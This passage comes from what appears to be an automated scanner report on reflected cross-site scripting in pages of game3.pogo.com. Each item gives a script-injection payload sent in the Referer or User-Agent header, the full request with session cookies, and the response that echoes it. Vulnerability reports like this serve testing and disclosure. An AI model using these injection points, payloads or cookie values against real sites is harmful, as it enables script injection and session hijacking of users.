Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=39631</script><script>alert(1)</script>d147f5bfa20

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:27 GMT
Server: Apache-Coyote/1.1
Content-Length: 35442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=39631</script><script>alert(1)</script>d147f5bfa20";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.642. http://game3.pogo.com/room/game/gameshell.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/game/gameshell.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7b9b</script><script>alert(1)</script>8b1c40b04d0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /room/game/gameshell.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=d7b9b</script><script>alert(1)</script>8b1c40b04d0

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:14 GMT
Server: Apache-Coyote/1.1
Content-Length: 35486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=d7b9b</script><script>alert(1)</script>8b1c40b04d0";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.643. http://game3.pogo.com/room/loading/init.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/init.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11234</script><script>alert(1)</script>444be4cd02c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /room/loading/init.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=11234</script><script>alert(1)</script>444be4cd02c

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Content-Length: 4179
Date: Sun, 09 Jan 2011 02:14:51 GMT
Server: Apache-Coyote/1.1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Address Messed Up
   </title>



...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=11234</script><script>alert(1)</script>444be4cd02c";
s.eVar2="pogo";
s.pageName="ERROR: Address Messed Up Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Address Messed Up Page:Non Authenticated";
s.prop8="Non Authenticated";
...[SNIP]...

3.644. http://game3.pogo.com/room/loading/jvmtest.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/jvmtest.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d33b9</script><script>alert(1)</script>3100c016d20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /room/loading/jvmtest.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=d33b9</script><script>alert(1)</script>3100c016d20

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Content-Length: 4179
Date: Sun, 09 Jan 2011 02:14:52 GMT
Server: Apache-Coyote/1.1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Address Messed Up
   </title>



...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=d33b9</script><script>alert(1)</script>3100c016d20";
s.eVar2="pogo";
s.pageName="ERROR: Address Messed Up Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Address Messed Up Page:Non Authenticated";
s.prop8="Non Authenticated";
...[SNIP]...

3.645. http://game3.pogo.com/room/loading/jvmtest.jsp [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/jvmtest.jsp

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4313"><script>alert(1)</script>cb56d21662f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10a4313"><script>alert(1)</script>cb56d21662f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:37 GMT
Server: Apache-Coyote/1.1
Content-Length: 1414

<html>

<script type="text/javascript">
   function show(dest) {
       if (top.window.opener) {
           top.window.opener.location.replace(dest);
           top.window.close();
       }
       else {
           top.window.
...[SNIP]...
<param name="browserInfo" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10a4313"><script>alert(1)</script>cb56d21662f">
...[SNIP]...

3.646. http://game3.pogo.com/room/loading/loading.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/loading.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57849</script><script>alert(1)</script>2e30affd4d0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /room/loading/loading.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=57849</script><script>alert(1)</script>2e30affd4d0

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Content-Length: 4179
Date: Sun, 09 Jan 2011 02:14:53 GMT
Server: Apache-Coyote/1.1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Address Messed Up
   </title>



...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=57849</script><script>alert(1)</script>2e30affd4d0";
s.eVar2="pogo";
s.pageName="ERROR: Address Messed Up Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Address Messed Up Page:Non Authenticated";
s.prop8="Non Authenticated";
...[SNIP]...

3.647. http://game3.pogo.com/room/loading/loading.jsp [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/loading.jsp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c728b</script><script>alert(1)</script>38c7dbac39a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c728b</script><script>alert(1)</script>38c7dbac39a
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:14:58 GMT
Server: Apache-Coyote/1.1
Content-Length: 1859

<html>

<body>

<script language="javascript">

   function setVisible(elementName, visible) {
       elementToChangeState = getElementReference(elementName);
       //alert('found element
...[SNIP]...
<param name="browserInfo" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c728b</script><script>alert(1)</script>38c7dbac39a">
...[SNIP]...

3.648. http://game3.pogo.com/room/loading/loading.jsp [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/loading.jsp

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73c5e"><script>alert(1)</script>3ef13ef919 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: 73c5e"><script>alert(1)</script>3ef13ef919
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:14:55 GMT
Server: Apache-Coyote/1.1
Content-Length: 1710

<html>

<body>

<script language="javascript">

   function setVisible(elementName, visible) {
       elementToChangeState = getElementReference(elementName);
       //alert('found element
...[SNIP]...
<param name="browserInfo" value="73c5e"><script>alert(1)</script>3ef13ef919">
...[SNIP]...

3.649. http://game3.pogo.com/room/util/urlopen.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/util/urlopen.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d25a</script><script>alert(1)</script>e015009fb05 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /room/util/urlopen.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=4d25a</script><script>alert(1)</script>e015009fb05

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Content-Length: 4179
Date: Sun, 09 Jan 2011 02:15:21 GMT
Server: Apache-Coyote/1.1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Address Messed Up
   </title>



...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=4d25a</script><script>alert(1)</script>e015009fb05";
s.eVar2="pogo";
s.pageName="ERROR: Address Messed Up Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Address Messed Up Page:Non Authenticated";
s.prop8="Non Authenticated";
...[SNIP]...

3.650. http://game3.pogo.com/util/client-props.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/util/client-props.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c14fe</script><script>alert(1)</script>03c013b122e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /util/client-props.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=c14fe</script><script>alert(1)</script>03c013b122e

Response

HTTP/1.1 400
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:16:00 GMT
Server: Apache-Coyote/1.1
Connection: close
Content-Length: 4179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Address Messed Up
   </title>



...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=c14fe</script><script>alert(1)</script>03c013b122e";
s.eVar2="pogo";
s.pageName="ERROR: Address Messed Up Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Address Messed Up Page:Non Authenticated";
s.prop8="Non Authenticated";
...[SNIP]...

3.651. http://game3.pogo.com/v/11.1.9.13/applet/scrabble/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/v/11.1.9.13/applet/scrabble/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a972b</script><script>alert(1)</script>84069feffea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /v/11.1.9.13/applet/scrabble/ HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=a972b</script><script>alert(1)</script>84069feffea

Response

HTTP/1.1 404 /applet/scrabble/
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html
Date: Sun, 09 Jan 2011 02:15:28 GMT
Server: Apache-Coyote/1.1
Content-Length: 3799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=a972b</script><script>alert(1)</script>84069feffea";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...

3.652. http://game3.pogo.com/v/11.1.9.44/applet/jvmtest/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/v/11.1.9.44/applet/jvmtest/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10ba1</script><script>alert(1)</script>022d3a73fd9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /v/11.1.9.44/applet/jvmtest/ HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=10ba1</script><script>alert(1)</script>022d3a73fd9

Response

HTTP/1.1 404 /applet/jvmtest/
Expires: 0
